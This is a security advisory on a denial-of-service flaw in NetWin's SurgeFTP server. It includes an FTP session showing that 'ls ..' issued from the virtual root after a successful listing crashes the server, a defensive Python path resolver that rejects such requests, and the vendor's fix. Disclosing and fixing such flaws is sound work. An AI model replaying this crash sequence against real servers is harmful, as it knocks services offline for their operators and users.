COMMAND

    SurgeFTP

SYSTEMS AFFECTED

    NetWin's SurgeFTP

PROBLEM

    The following is based on a Strumpf Noir Society advisory.  NetWin's
    SurgeFTP is an easy to manage and reliable FTP server with detailed
    reporting and easy to use management features.  SurgeFTP is
    available for both the Unix/Linux and Windows flavours of operating
    systems.

    Due to a design issue in the SurgeFTP server, a denial of service
    condition exists which could allow any user with local or shell
    access to the host to crash the server.  The problem lies in the
    server's local handling of the directory listing command: once a
    listing has completed successfully, a subsequent "malformed" listing
    request (below, "ls .." from the virtual root, which the server
    resolves to "/..") kills the server process.  Example:

        # ftp localhost
        Connected to testbak
        220 SurgeFTP testbak (Version 1.0b)
        User (testbak:(none)): anonymous
        331 Password required for anonymous.
        Password:
        230- Alias      Real path       Access
        230- /          /home           read
        230 User anonymous logged in.
        ftp> ls /
        200 Port command successful.
        150 Opening ASCII mode data connection for file list. (/)
        226 Transfer complete.
        ftp> ls ..
        200 Port command successful.
        150 Opening ASCII mode data connection for file list. (/..)
        -> ftp get:Connection reset by peer
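    The crash above happens because the listing handler hands a path that
    climbs above the virtual root ("/..") on to code that does not expect
    it.  The following is an added example, not SurgeFTP's code: a minimal
    resolver of the kind a LIST/NLST handler should run before touching the
    filesystem.  It resolves the requested path against the current
    directory, refuses any path that pops past the virtual root with a 550
    reply instead of failing, and only then maps the virtual path onto the
    real path through an alias table.  The alias table is constructed to
    mirror the 230- banner in the session above; the function names and
    reply texts are this example's own assumptions.

```python
"""Reject FTP directory-listing paths that climb above the virtual root.

Added example, not SurgeFTP code: what a LIST/NLST handler should do with
a request such as "ls .." issued from the virtual root.
"""
import posixpath
from typing import Dict, Optional, Tuple

# Constructed alias table, modelled on the 230- banner in the advisory:
#     Alias  Real path  Access
#     /      /home      read
ALIASES: Dict[str, str] = {"/": "/home"}


def canonicalize(cwd: str, requested: str) -> Optional[str]:
    """Resolve `requested` relative to `cwd` into a canonical virtual path.

    Returns None if the path tries to climb above the virtual root ("/").
    posixpath.normpath is deliberately NOT used: it silently folds "/.."
    into "/", which hides the escape attempt instead of flagging it.
    """
    joined = requested if requested.startswith("/") else posixpath.join(cwd, requested)
    stack = []
    for part in joined.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if not stack:          # already at the root: nothing left to pop
                return None
            stack.pop()
            continue
        stack.append(part)
    return "/" + "/".join(stack)


def map_to_real(virtual: str, aliases: Dict[str, str] = ALIASES) -> Optional[str]:
    """Map a canonical virtual path onto its real path via the alias table.

    Picks the longest matching alias prefix so nested aliases resolve
    correctly.  Returns None if no alias covers the path.
    """
    best = None
    for alias in aliases:
        if virtual == alias or virtual.startswith(alias.rstrip("/") + "/"):
            if best is None or len(alias) > len(best):
                best = alias
    if best is None:
        return None
    remainder = virtual[len(best):].lstrip("/")
    return posixpath.join(aliases[best], remainder) if remainder else aliases[best]


def list_reply(cwd: str, requested: str) -> Tuple[int, str]:
    """Produce the FTP reply a hardened LIST handler would send.

    150 with the real directory on success, 550 on a rejected path.  The
    filesystem is never reached with a path outside the virtual root.
    """
    virtual = canonicalize(cwd, requested)
    if virtual is None:
        return 550, f"{requested}: path escapes the virtual root"
    real = map_to_real(virtual)
    if real is None:
        return 550, f"{requested}: no such directory"
    return 150, f"Opening ASCII mode data connection for file list. ({real})"


if __name__ == "__main__":
    # The two requests from the advisory's session, plus a deeper traversal.
    for req in ("/", "..", "/..", "pub/../../etc", "pub"):
        print(f"ls {req:<16} -> {list_reply('/', req)}")
```

    Run stand-alone, the script shows "ls /" resolving to /home with a 150
    reply while "ls .." and "ls /.." are answered with a 550 and never
    reach the filesystem layer, which is the behaviour the crashing server
    lacked.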

SOLUTION

    The vendor has been notified and has verified the problem.  Build
    v1.1h, which fixes this issue, has been released and is available
    from

        ftp://ftp.netwinsite.com/pub/surgeftp/